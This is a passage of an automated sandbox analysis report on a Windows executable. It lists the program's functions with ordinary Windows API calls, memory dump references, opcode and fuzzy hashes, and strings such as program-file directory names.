SHGetKnownFolderPath.SHELL32(0049AD40,00008000,00000000,?), ref: 0047CD1F
CoTaskMemFree.OLE32(?,0047CD62), ref: 0047CD55

Strings

ProgramFilesDir, xrefs: 0047CBB8, 0047CC3F
SystemDrive, xrefs: 0047CB57
CommonFilesDir, xrefs: 0047CBF2, 0047CC6E
\Program Files, xrefs: 0047CBDF
COMMAND.COM, xrefs: 0047CDA1
Failed to get path of 64-bit Program Files directory, xrefs: 0047CC61
Common Files, xrefs: 0047CC29
cmd.exe, xrefs: 0047CD80
Failed to get path of 64-bit Common Files directory, xrefs: 0047CC90

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 9e7160287d512f4d5a0f43fb802c4f91855d32992ec2e49df479a39f9ab0f4c4
Instruction ID: 7f5f99bd267ec43f1d9e9eb65a142f78238518b51070f33a36bda7c886c43a5d
Opcode Fuzzy Hash: 9e7160287d512f4d5a0f43fb802c4f91855d32992ec2e49df479a39f9ab0f4c4
Instruction Fuzzy Hash: A8E06D31700600BEEB21DA619D92F697BA8EB48F04B61847AF504A2680D67CA900D61C

Function 0045096C Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470341,?,00000000), ref: 00450982
GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470341,?,00000000), ref: 0045098A

Part of subcall function 00450728: GetLastError.KERNEL32(00450544,004507EA,?,00000000,?,00498504,00000001,00000000,00000002,00000000,00498665,?,?,00000005,00000000,00498699), ref: 0045072B

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 100ca62c34f2286d257a35485dd07fe068b79b72f0d05f198151f02be955c629
Instruction ID: 93da46c6f1b31e6960e6eabd2e871c03f6a9f1a2e882d04747869ab33c8136e3
Opcode Fuzzy Hash: 100ca62c34f2286d257a35485dd07fe068b79b72f0d05f198151f02be955c629
Instruction Fuzzy Hash: 22E012B9305201ABF740EA7599C1F2F23DCDB48355F00986AB944CA18BD674DC054B66

Function 0040626C Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 0040626E
GlobalLock.KERNEL32(00000000), ref: 00406274

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Global$AllocLock
String ID:
API String ID: 15508794-0
Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
Instruction ID: 56019af84ea84d57b40f02c4528a45173e4f1cdf38a2be340d0d32551c2e1a06
Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
Instruction Fuzzy Hash: 699002C4C01A00A4DC0072B20C0BD3F101CD8C072C3D1486F7044B6483887C88000979

Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7d9236a51a6e62d759a8b4f250f4c89c76a4556442c2f53cae6702f33709ebd9
Instruction ID: 72296c24d993e0564b30de85c6f195fe79285825457dd4606d191d555c4bfbf2
Opcode Fuzzy Hash: 7d9236a51a6e62d759a8b4f250f4c89c76a4556442c2f53cae6702f33709ebd9
Instruction Fuzzy Hash: D1F08272B0063067EB605A6A4C81B6359849BC5794F254076FD09FF3E9D6B58C0142A9

Function 004085EC Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408722), ref: 0040860B

Part of subcall function 00406DFC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E19

Part of subcall function 00408578: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049C4C0,00000001,?,00408643,?,00000000,00408722), ref: 00408596

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 5823267eaa6e0e7ee692efbee1c67039304ac956db3a02cff78b9572607a147c
Instruction ID: 87d691d9fb5281b9ea88bf14f35752b700db14023ee960ec0a49684e6ef053d8
Opcode Fuzzy Hash: 5823267eaa6e0e7ee692efbee1c67039304ac956db3a02cff78b9572607a147c
Instruction Fuzzy Hash: AF316135E00109ABCB00DF55C8C19EEB779FF84314F51857BE815BB296EB38AE018B98

Function 0041FBAC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoScroll
String ID:
API String ID: 629608716-0
Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
Instruction ID: de9d69d4b93587d9dbc4e1ffcd6d3196287cd482c57983938f35f532835c4bfd
Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
Instruction Fuzzy Hash: 59213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6

Function 0046C550 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
Part of subcall function 0041EEB4: EnumThreadWindows.USER32(00000000,0041EE64,00000000), ref: 0041EF09

SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C5AE,?,00000000,?,?,0046C7C0,?,00000000,0046C834), ref: 0046C592

Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
String ID:
API String ID: 3319771486-0
Opcode ID: cb068eb5dc710ff6006224cfa849e4d5ce5cc64b4f431f923f3b0af9e5388d0c
Instruction ID: d90c9d50ec1a4df7de9101e34a36142223e0e09c2726da2ffd76a0a6e3d4faee
Opcode Fuzzy Hash: cb068eb5dc710ff6006224cfa849e4d5ce5cc64b4f431f923f3b0af9e5388d0c
Instruction Fuzzy Hash: 3CF0B471608300BFE7059B62EC56B257BA8D708714F91047BF40586290E5BD6844C55E

Function 00441408 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 0044141F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction ID: 093968fef036cde5cefa550fbb81a5587008482849b5a1bc4febea26ac521eef
Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction Fuzzy Hash: 2AF09030105109DFAF0CCF58D0669AF77A5EB48314B20807FEA0B877A0C634AE80D759

Function 00416560 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5ff731208ea2669c00132db587fc5b09c37a3f2098bcfa82a293bed1c7b74572
Instruction ID: bf23e32d75ed6c1bba1609a99bdb6fc4fe5539f7daeb337dc53a21feff163cdc
Opcode Fuzzy Hash: 5ff731208ea2669c00132db587fc5b09c37a3f2098bcfa82a293bed1c7b74572
Instruction Fuzzy Hash: 22F019B2200510AFDB84CEDCD8C0F9373ECEB0C250B0481A6BA08CB21AD220EC108BB0

Function 004149C4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91

Function 00450838 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450878

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c47705c650c03eeb3fa213ca8ef127fbab7ce4e86e84a6a981bf3da871867329
Instruction ID: ad17be180c76723165afa97522f1f8cb50e5cc3c1ac5aed9be9dbb48c14aba74
Opcode Fuzzy Hash: c47705c650c03eeb3fa213ca8ef127fbab7ce4e86e84a6a981bf3da871867329
Instruction Fuzzy Hash: D9E0EDB53441583ED6809AAC6C42F9677DC971A724F018433B998D7241D4619D258BE9

Function 0042CCDC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A99,00000000,00452ABA,?,00000000), ref: 0042CD07

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9c61d9913643e7fc8a87719d436576f713db19c75eb1cc22161a8dfdf450bb3f
Instruction ID: e42bb19430493de12fff977eb98fa38a093f16e856f4d8eabd15c7f5a46843e5
Opcode Fuzzy Hash: 9c61d9913643e7fc8a87719d436576f713db19c75eb1cc22161a8dfdf450bb3f
Instruction Fuzzy Hash: 7DE06571314308BBD701EB62EC92A5EBAECD749714B914476B400D7592D5B86E008468

Function 0042E8D8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004532E7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 7e342571288affc5bafe57b4e7aa38107ccfa77ae99db5e17a7a6f0d9f50f535
Instruction ID: 7522df6bb5b7b377145cdc83deeae8a000ac75e555bea28060da8a54cd92ba64
Opcode Fuzzy Hash: 7e342571288affc5bafe57b4e7aa38107ccfa77ae99db5e17a7a6f0d9f50f535
Instruction Fuzzy Hash: F6E0D86178432126F23524166C43B7B110E43C0704FD440267A809F3D2D6EE9946425E

Function 0041AF80 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AFAB

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ExtentPointText
String ID:
API String ID: 566491939-0
Opcode ID: 659619b104fd3feb772cd8971a1adc9358da70abd3c785c83c8eafe460c49850
Instruction ID: cc428d1e896f501deb349ed904fe83369ead32346870d879665800f49654eebb
Opcode Fuzzy Hash: 659619b104fd3feb772cd8971a1adc9358da70abd3c785c83c8eafe460c49850
Instruction Fuzzy Hash: 8EE026F13092002B9200E67E1CC1C9BA7DC8A0822A300823AF808E73C2D62CCD1A03AE

Function 004062F8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406321

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
Instruction ID: 1e3b386673cc32b76f3712ab4659b14af7d7742474b1f2ca80afcc4f691b27f6
Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
Instruction Fuzzy Hash: 26E002B221430DBFDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972528675AC608B71

Function 0042DDF4 Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 04d8f955b4ea1680ce84362706bb61212f931f51abc1de06f6e1381d22c6f23e
Instruction ID: a58665afa9aaed36f31adbd0eb633891456326e8230674c5ed5073cd96bdc880
Opcode Fuzzy Hash: 04d8f955b4ea1680ce84362706bb61212f931f51abc1de06f6e1381d22c6f23e
Instruction Fuzzy Hash: DDE07EB6600119AF9B40DE8CDC81EEB37ADAB5D350F454016FA08EB200C2B8EC519BA4

Function 00454C6C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000,000000FF,00470B64,00000000,0047197A,?,00000000,004719C5,?,00000000,00471AFE,?,00000000,?,00000000), ref: 00454C82

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 7eca246021524149fec22f5b43aaa658f949ce3293e179ae35ef6e6ce88d0451
Instruction ID: ed6c632c5edb2c773ab29dc4195d65b8984e4b681e68d3fe1efecde2d4089f6a
Opcode Fuzzy Hash: 7eca246021524149fec22f5b43aaa658f949ce3293e179ae35ef6e6ce88d0451
Instruction Fuzzy Hash: 3AE09B705056004BCB15DF3A858131A76D15FC5324F05C96AAC5CCF3D7D63C84554717

Function 0041468C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(004960BE,?,004960E0,?,?,00000000,004960BE,?,?), ref: 004146AB

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0

Function 00406F20 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F34

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3762a51e43609c3b4bae8470f6c1dc5ae0f0561e9ae868b0f3c10d30521955a8
Instruction ID: f35b24215c0fdc632c147a12649f74ed31c2b31f11cb39250bbd2ff5eed7ffe6
Opcode Fuzzy Hash: 3762a51e43609c3b4bae8470f6c1dc5ae0f0561e9ae868b0f3c10d30521955a8
Instruction Fuzzy Hash: 5CD012723081506AD220A65A6C44EAB6ADCCBC5770F11063AB558D2181D6209C018675

Function 0042365C Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D

ShowWindow.USER32(00410470,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
